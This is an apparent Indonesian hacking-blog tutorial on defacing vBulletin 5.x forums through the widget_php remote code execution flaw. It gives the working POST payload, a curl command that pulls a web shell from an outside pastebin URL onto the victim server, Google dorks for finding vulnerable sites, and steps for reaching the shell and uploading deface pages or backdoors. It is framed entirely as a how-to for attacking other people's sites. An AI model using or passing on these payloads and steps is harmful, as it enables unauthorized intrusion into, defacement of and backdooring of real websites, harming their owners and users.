Deface Exploit Vbulletin RCE Version 5.x.x Using Post Data



Haloo Exploiters !! kali ini saya akan membagikan tutorial Defaceing Metode Vbulletin Remote Code Execution Versi 5.x.x dengan menggunakan post data. ok langsung saja

#RCE Command :
- widgetConfig[code]=echo shell_exec('id'); exit;
- widgetConfig[code]=echo shell_exec('curl https://pastebin.com/raw/4VcQuc55 -o exploit.php'); exit; ( Untuk Upshell )

#Google Dork :
- "Powered By Vbulletin"+"Version 5.5.4"
- "Powered By Vbulletin"+"Version 5.4.5"
Selebihnya gunakan otak kalian

OK kalian dorking dulu, saya anggap kalian telah dapat targetnya. cara mengecek vuln atau tidak dengan menambahkan /ajax/render/widget_php di depan domain. contoh : target.com/ajax/render/widget_php lihat gambar dibawah


setelah itu aktifkan post datanya.. ( jika kalian user android bisa menggunakan aplikasi anon hackbar / Android Hackbar ) masukkan command rcenya ( widgetConfig[code]=echo shell_exec('id'); exit; ), jika ada respon dari commandnya berarti web tersebut vuln, lihat gambar dibawah


langsung saja upload shell : widgetConfig[code]=echo shell_exec('curl https://pastebin.com/raw/4VcQuc55 -o exploit.php'); exit;
webnya blank ? kemungkinan terupload shellnya


akses shellnya target.com/forum/exploit.php atau target.com /exploit.php atau target.com /forums/exploit.php



dan upload script deface atau shell backdoor kalian, disini saya hanya nitip saja


OK semoga artikel ini bermanfaat bagi kalian. jangan lupa untuk share ke teman2 kalian
LihatTutupKomentar